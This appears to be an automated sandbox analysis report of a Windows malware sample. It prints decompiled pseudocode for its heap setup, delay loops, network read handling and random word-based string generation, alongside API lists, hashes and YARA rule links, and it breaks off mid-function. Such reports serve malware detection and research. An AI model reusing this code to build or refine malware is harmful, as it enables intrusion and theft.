                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1295030180-0
                                                                                                                                  • Opcode ID: 6deb68084f494a408edfe5ff2ce20fbadaefa9b20aa98af484a7b790d0ec6119
                                                                                                                                  • Instruction ID: b0c59db4ab5e7b15a2be1575b61f7089429b3b28e591f8a464db39965701c805
                                                                                                                                  • Opcode Fuzzy Hash: 6deb68084f494a408edfe5ff2ce20fbadaefa9b20aa98af484a7b790d0ec6119
                                                                                                                                  • Instruction Fuzzy Hash: FB216079900609FFEB00EF95DD44DEEBBB9EF4C305F100066E511A6250CB719A45EB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A262F, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E031A262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x31ad270 = _t10;
				if(_t10 != 0) {
					 *0x31ad160 = GetTickCount();
					_t12 = E031A1A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L031AB02E();
							_t34 = _t14 + _t16;
							_t18 = E031A4F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E031A27C7(_t26) != 0) {
							 *0x31ad298 = 1; // executed
						}
						_t12 = E031A520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                                  0x031a262f
                                                                                                                                  0x031a2635
                                                                                                                                  0x031a2636
                                                                                                                                  0x031a2642
                                                                                                                                  0x031a2648
                                                                                                                                  0x031a264f
                                                                                                                                  0x031a265f
                                                                                                                                  0x031a2664
                                                                                                                                  0x031a266b
                                                                                                                                  0x031a266d
                                                                                                                                  0x031a2672
                                                                                                                                  0x031a2678
                                                                                                                                  0x031a267e
                                                                                                                                  0x031a2688
                                                                                                                                  0x031a268c
                                                                                                                                  0x031a268e
                                                                                                                                  0x031a2693
                                                                                                                                  0x031a2694
                                                                                                                                  0x031a2695
                                                                                                                                  0x031a269a
                                                                                                                                  0x031a26a0
                                                                                                                                  0x031a26ab
                                                                                                                                  0x031a26ac
                                                                                                                                  0x031a26b2
                                                                                                                                  0x031a26b8
                                                                                                                                  0x031a26c4
                                                                                                                                  0x031a26c6
                                                                                                                                  0x031a26c6
                                                                                                                                  0x031a26d0
                                                                                                                                  0x031a26d0
                                                                                                                                  0x031a2651
                                                                                                                                  0x031a2653
                                                                                                                                  0x031a2653
                                                                                                                                  0x031a26da

                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A2642
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A2656
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,031A1900,?), ref: 031A2672
                                                                                                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A2678
                                                                                                                                  • _aullrem.NTDLL(?,?,00000013,00000000), ref: 031A2695
                                                                                                                                  • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A26B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 507476733-0
                                                                                                                                  • Opcode ID: bdc7ac6719fccd8e4286f9862cf1da6557f7642664b559fecd19b41b9697c70f
                                                                                                                                  • Instruction ID: f118e1064bc23aee8e5dedf86407a37fd26720c2b46c150cc79e4219b42dce88
                                                                                                                                  • Opcode Fuzzy Hash: bdc7ac6719fccd8e4286f9862cf1da6557f7642664b559fecd19b41b9697c70f
                                                                                                                                  • Instruction Fuzzy Hash: 4011C67EA45F046BD724AB78EC19F5A76AC9B4C353F040525FA09C6280EBB0D48186B0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4F07, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E031A4F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0x31ad130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E031A75F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x31ad2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E031A4AAB(_v20);
											if(_v8 == 0) {
												_t54 = E031A3B3F(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E031A121A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                                                                                                                                  0x031a4f08
                                                                                                                                  0x031a4f0e
                                                                                                                                  0x031a4f19
                                                                                                                                  0x031a4f19
                                                                                                                                  0x031a4f1b
                                                                                                                                  0x031a7613
                                                                                                                                  0x031a7616
                                                                                                                                  0x031a761f
                                                                                                                                  0x031a7622
                                                                                                                                  0x031a7625
                                                                                                                                  0x031a762d
                                                                                                                                  0x031a772b
                                                                                                                                  0x031a7731
                                                                                                                                  0x031a7739
                                                                                                                                  0x031a773b
                                                                                                                                  0x00000000
                                                                                                                                  0x031a773b
                                                                                                                                  0x031a7633
                                                                                                                                  0x031a7636
                                                                                                                                  0x031a773e
                                                                                                                                  0x031a773e
                                                                                                                                  0x031a763c
                                                                                                                                  0x031a7643
                                                                                                                                  0x031a764b
                                                                                                                                  0x031a7722
                                                                                                                                  0x031a7651
                                                                                                                                  0x031a7657
                                                                                                                                  0x031a765c
                                                                                                                                  0x031a7661
                                                                                                                                  0x031a7710
                                                                                                                                  0x031a7667
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7667
                                                                                                                                  0x031a7667
                                                                                                                                  0x031a7667
                                                                                                                                  0x031a7667
                                                                                                                                  0x031a766c
                                                                                                                                  0x031a766e
                                                                                                                                  0x031a766e
                                                                                                                                  0x031a767b
                                                                                                                                  0x031a7683
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7685
                                                                                                                                  0x031a7692
                                                                                                                                  0x031a7698
                                                                                                                                  0x031a7698
                                                                                                                                  0x031a769b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a769d
                                                                                                                                  0x031a76a8
                                                                                                                                  0x031a76bc
                                                                                                                                  0x031a76f2
                                                                                                                                  0x031a76be
                                                                                                                                  0x031a76be
                                                                                                                                  0x031a76c5
                                                                                                                                  0x031a76cd
                                                                                                                                  0x00000000
                                                                                                                                  0x031a76cf
                                                                                                                                  0x031a76cf
                                                                                                                                  0x031a76d5
                                                                                                                                  0x031a76dd
                                                                                                                                  0x031a76e4
                                                                                                                                  0x00000000
                                                                                                                                  0x031a76e4
                                                                                                                                  0x031a76dd
                                                                                                                                  0x031a76cd
                                                                                                                                  0x031a76f5
                                                                                                                                  0x031a76f8
                                                                                                                                  0x031a7700
                                                                                                                                  0x031a7706
                                                                                                                                  0x031a770b
                                                                                                                                  0x031a770b
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7700
                                                                                                                                  0x031a76a5
                                                                                                                                  0x00000000
                                                                                                                                  0x031a76e7
                                                                                                                                  0x031a76e7
                                                                                                                                  0x00000000
                                                                                                                                  0x031a76f0
                                                                                                                                  0x031a7717
                                                                                                                                  0x031a7717
                                                                                                                                  0x031a771d
                                                                                                                                  0x031a771d
                                                                                                                                  0x031a764b
                                                                                                                                  0x031a7636
                                                                                                                                  0x031a7748
                                                                                                                                  0x031a4f10
                                                                                                                                  0x031a4f10
                                                                                                                                  0x031a4f17
                                                                                                                                  0x031a4f22
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4f17

                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 031A76AF
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A76CF
                                                                                                                                    • Part of subcall function 031A121A: wcstombs.NTDLL ref: 031A12DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2344289193-3251738875
                                                                                                                                  • Opcode ID: 3a87d8566259c3337b0ab61381cb28b543875b241abe050195e18b4737da7281
                                                                                                                                  • Instruction ID: a97a4f2de2a1c9bbd28f1e7a04dc6b0a14545885d0fb6981fb1329befdd005d2
                                                                                                                                  • Opcode Fuzzy Hash: 3a87d8566259c3337b0ab61381cb28b543875b241abe050195e18b4737da7281
                                                                                                                                  • Instruction Fuzzy Hash: 19410079900A05EFDF14EFECD988AADB7B9FB0C346F1444A9E405E7151D7309A80DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A9311, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                  			E031A9311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x31ad364; // 0x5bd95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x31ad364; // 0x5bd95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x31ad030) {
					HeapFree( *0x31ad270, 0, _t8);
				}
				_t9 = E031A5141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x31ad364; // 0x5bd95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                                                  0x031a9311
                                                                                                                                  0x031a9311
                                                                                                                                  0x031a931a
                                                                                                                                  0x031a932a
                                                                                                                                  0x031a932a
                                                                                                                                  0x031a932f
                                                                                                                                  0x031a9334
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a9324
                                                                                                                                  0x031a9324
                                                                                                                                  0x031a9336
                                                                                                                                  0x031a933a
                                                                                                                                  0x031a934c
                                                                                                                                  0x031a934c
                                                                                                                                  0x031a9357
                                                                                                                                  0x031a935c
                                                                                                                                  0x031a935f
                                                                                                                                  0x031a9364
                                                                                                                                  0x031a9368
                                                                                                                                  0x031a936e

                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A931A
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,031A5390), ref: 031A9324
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,031A5390), ref: 031A934C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A9368
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 0b6c0af516e0feccb9e6d4fdd8289fd2ffda7c578cf4a75c6b7b3cb7c91c971f
                                                                                                                                  • Instruction ID: d9d1f003211ea23dea32c38068ca6d827802faac80993dc94dcbd686ec5075f3
                                                                                                                                  • Opcode Fuzzy Hash: 0b6c0af516e0feccb9e6d4fdd8289fd2ffda7c578cf4a75c6b7b3cb7c91c971f
                                                                                                                                  • Instruction Fuzzy Hash: 16F0DAB9604E40ABD728EF78EA58B177BB4BF1D343B088414B541D6595D730D8C0DB25
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A520D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E031A520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E031A154A();
				if(_t21 != 0) {
					_t59 =  *0x31ad294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x31ad294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x31ad12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E031A21DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x31ad2e0; // 0x2a2a5a8
					if( *0x31ad294 > 5) {
						_t8 = _t26 + 0x31ae5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x31ae9f9; // 0x44283a44
						_t27 = _t7;
					}
					E031A11F4(_t27, _t27);
					_t31 = E031A3598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x31ad2a8 =  *0x31ad2a8 ^ 0x81bbe65d;
						_t32 = E031A75F6(0x60);
						 *0x31ad364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x31ad364; // 0x5bd95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x31ad364; // 0x5bd95b0
							 *_t51 = 0x31ae823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x31ad270, 0, 0x43);
							 *0x31ad300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x31ad294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x31ad2e0; // 0x2a2a5a8
								_t13 = _t58 + 0x31ae55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x31ac2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E031AA82B( ~_v8 &  *0x31ad2a8, 0x31ad00c); // executed
								_t42 = E031A4C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E031A74A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E031A5461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E031A3FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x31ad128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E031A5AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                                                  0x031a520d
                                                                                                                                  0x031a5218
                                                                                                                                  0x031a521b
                                                                                                                                  0x031a521e
                                                                                                                                  0x031a5221
                                                                                                                                  0x031a5228
                                                                                                                                  0x031a522a
                                                                                                                                  0x031a5236
                                                                                                                                  0x031a5238
                                                                                                                                  0x031a5238
                                                                                                                                  0x031a5241
                                                                                                                                  0x031a5247
                                                                                                                                  0x031a524c
                                                                                                                                  0x031a5266
                                                                                                                                  0x031a5272
                                                                                                                                  0x031a5274
                                                                                                                                  0x031a5279
                                                                                                                                  0x031a5283
                                                                                                                                  0x031a5283
                                                                                                                                  0x031a527b
                                                                                                                                  0x031a527b
                                                                                                                                  0x031a527b
                                                                                                                                  0x031a527b
                                                                                                                                  0x031a528a
                                                                                                                                  0x031a5297
                                                                                                                                  0x031a529e
                                                                                                                                  0x031a52a3
                                                                                                                                  0x031a52a3
                                                                                                                                  0x031a52ab
                                                                                                                                  0x031a52ae
                                                                                                                                  0x031a52d4
                                                                                                                                  0x031a52e0
                                                                                                                                  0x031a52e5
                                                                                                                                  0x031a52ea
                                                                                                                                  0x031a52ec
                                                                                                                                  0x031a5318
                                                                                                                                  0x031a531a
                                                                                                                                  0x031a52ee
                                                                                                                                  0x031a52f2
                                                                                                                                  0x031a52f7
                                                                                                                                  0x031a52fc
                                                                                                                                  0x031a5303
                                                                                                                                  0x031a5309
                                                                                                                                  0x031a530e
                                                                                                                                  0x031a5314
                                                                                                                                  0x031a531b
                                                                                                                                  0x031a531d
                                                                                                                                  0x031a531f
                                                                                                                                  0x031a532e
                                                                                                                                  0x031a5334
                                                                                                                                  0x031a5339
                                                                                                                                  0x031a533b
                                                                                                                                  0x031a536b
                                                                                                                                  0x031a536d
                                                                                                                                  0x031a533d
                                                                                                                                  0x031a533d
                                                                                                                                  0x031a5343
                                                                                                                                  0x031a5350
                                                                                                                                  0x031a5356
                                                                                                                                  0x031a5356
                                                                                                                                  0x031a535e
                                                                                                                                  0x031a5367
                                                                                                                                  0x031a536e
                                                                                                                                  0x031a5370
                                                                                                                                  0x031a5372
                                                                                                                                  0x031a5379
                                                                                                                                  0x031a5386
                                                                                                                                  0x031a538b
                                                                                                                                  0x031a5390
                                                                                                                                  0x031a5392
                                                                                                                                  0x031a5394
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5396
                                                                                                                                  0x031a539b
                                                                                                                                  0x031a539d
                                                                                                                                  0x031a53a4
                                                                                                                                  0x031a53a8
                                                                                                                                  0x031a53ab
                                                                                                                                  0x031a53c0
                                                                                                                                  0x031a53c4
                                                                                                                                  0x031a53c9
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53c9
                                                                                                                                  0x031a53ad
                                                                                                                                  0x031a53af
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53ba
                                                                                                                                  0x031a53bc
                                                                                                                                  0x031a53be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53be
                                                                                                                                  0x031a53a1
                                                                                                                                  0x031a53a1
                                                                                                                                  0x031a5372
                                                                                                                                  0x031a52b0
                                                                                                                                  0x031a52b0
                                                                                                                                  0x031a52b5
                                                                                                                                  0x031a53cb
                                                                                                                                  0x031a53cf
                                                                                                                                  0x031a53d7
                                                                                                                                  0x031a53d7
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53cf
                                                                                                                                  0x031a52bb
                                                                                                                                  0x031a52be
                                                                                                                                  0x031a52c8
                                                                                                                                  0x031a52cf
                                                                                                                                  0x00000000
                                                                                                                                  0x031a53df
                                                                                                                                  0x031a53df
                                                                                                                                  0x031a53e3
                                                                                                                                  0x031a53e7
                                                                                                                                  0x031a53e7

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,031A5226,00000000,00000000), ref: 031A1559
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 031A52A3
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • memset.NTDLL ref: 031A52F2
                                                                                                                                  • RtlInitializeCriticalSection.NTDLL(05BD9570), ref: 031A5303
                                                                                                                                    • Part of subcall function 031A3FC2: memset.NTDLL ref: 031A3FD7
                                                                                                                                    • Part of subcall function 031A3FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 031A4019
                                                                                                                                    • Part of subcall function 031A3FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 031A4024
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 031A532E
                                                                                                                                  • wsprintfA.USER32 ref: 031A535E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4246211962-0
                                                                                                                                  • Opcode ID: b067c9ca8602b600b2c6fc309577ff17b9e43e2c62ae925cbacee47b1b7e335a
                                                                                                                                  • Instruction ID: 6b9aa70ddbd299cd9a3d20e233489864b1b3bbfddf10e694e0d07e0daf7a80dd
                                                                                                                                  • Opcode Fuzzy Hash: b067c9ca8602b600b2c6fc309577ff17b9e43e2c62ae925cbacee47b1b7e335a
                                                                                                                                  • Instruction Fuzzy Hash: 945115BDA08F14AFDB14EBADE894B6E73A9AF4D703F080426E541D7140E7B08584CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A78E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                  			E031A78E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E031A75F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E031A4AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E031A75F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x31ad2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
